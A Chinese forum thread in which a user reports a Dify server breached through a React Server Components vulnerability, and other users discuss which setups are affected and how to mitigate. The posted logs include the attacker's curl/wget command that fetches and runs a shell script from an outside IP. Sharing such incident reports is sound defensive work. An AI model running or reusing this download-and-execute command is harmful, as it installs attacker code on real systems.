V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Jony4Fun
V2EX  ›  信息安全

第一次遇到这么 bt 的问题,原来是 React 的漏洞

  •  
  •   Jony4Fun · 13 小时 33 分钟前 · 1977 次点击

    从今天下午 4 点起,云服务器不断报警,下载了 xlg_amd64 、xlg.shget.sh 等奇奇怪怪的脚本。 杀了过了一会又出现了,

    最终定位到是 dify 的 web 容器执行的脚本。

    一直没仔细看云平台上的告警:CVE-2025-66478 ( https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components

    dify issue 里显示修复了: https://github.com/langgenius/dify/issues/29202

    但是晚上我升级到了 1.10.1-fix.1 ,发现还是有这个问题。。请示领导先关服务了。

    脚本名字起得都如此凶戾。

    14:29:16 0|dify-web  | /bin/sh: curl: not found
    14:29:16 0|dify-web  | Connecting to 103.135.101.15 (103.135.101.15:80)
    14:29:16 0|dify-web  | wget: can't connect to remote host (103.135.101.15): Connection refused
    14:29:16 0|dify-web  | sh: can't open 'wocaosinm.sh': No such file or directory
    14:29:16 0|dify-web  | rm: can't remove 'wocaosinm.sh': No such file or directory
    14:29:16 0|dify-web  |  ⨯ [Error: Command failed: curl http://103.135.101.15/wocaosinm.sh;wget http://103.135.101.15/wocaosinm.sh;sh wocaosinm.sh;rm -r wocaosinm.sh
    14:29:16 0|dify-web  | /bin/sh: curl: not found
    14:29:16 0|dify-web  | Connecting to 103.135.101.15 (103.135.101.15:80)
    14:29:16 0|dify-web  | wget: can't connect to remote host (103.135.101.15): Connection refused
    14:29:16 0|dify-web  | sh: can't open 'wocaosinm.sh': No such file or directory
    14:29:16 0|dify-web  | rm: can't remove 'wocaosinm.sh': No such file or directory
    
    

    14 条回复    2025-12-06 12:49:35 +08:00
    shukuang
        1
    shukuang  
       13 小时 17 分钟前
    默认配置下 React 服务器,通杀漏洞,升级版本是唯一解决途径
    laminux29
        2
    laminux29  
       12 小时 10 分钟前
    wocaosinm.sh

    噗。。。。
    levelworm
        3
    levelworm  
       9 小时 29 分钟前
    能不能发个脚本的代码让我们欣赏一下。
    rick13
        4
    rick13  
       5 小时 53 分钟前
    笑死我了
    AmericanExpress
        5
    AmericanExpress  
       5 小时 52 分钟前 via iPhone
    @levelworm
    就在那个 curl 里面
    script 本身没啥 从这个 ip `103.135.101.15:80` 下载了一个 binary 并执行
    dankai
        6
    dankai  
       3 小时 22 分钟前
    这脚本名笑死🤣
    x86
        7
    x86  
       3 小时 6 分钟前
    命名丝毫不带藏的,笑死
    bingfengfeifei
        8
    bingfengfeifei  
       2 小时 40 分钟前
    lobechat 也中招了,这次这个影响范围感觉比之前的 log4j 漏洞大的多
    Wuuuu
        9
    Wuuuu  
       1 小时 30 分钟前
    很好奇,假如只用 react +其他后端,不用 nextjs ,是不是就没问题了……还是单纯 react 前端也受到影响了……
    bestie
        10
    bestie  
       1 小时 28 分钟前   ❤️ 1
    @Wuuuu #9 纯前端没影响,主要是 server component
    proxychains
        11
    proxychains  
       1 小时 23 分钟前
    笑死了
    Ketteiron
        12
    Ketteiron  
       1 小时 21 分钟前
    笑死了🤣可以评选今年最佳
    yefee
        13
    yefee  
       1 小时前
    我们客户服务器也中招了
    crysislinux
        14
    crysislinux  
       31 分钟前 via Android
    我们倒是没中这个,不过中了之前的供应链投毒。。大家 npm 还是切记要 ignore scripts ,。
    关于   ·   帮助文档   ·   自助推广系统   ·   博客   ·   API   ·   FAQ   ·   Solana   ·   2583 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 22ms · UTC 05:21 · PVG 13:21 · LAX 21:21 · JFK 00:21
    ♥ Do have faith in what you're doing.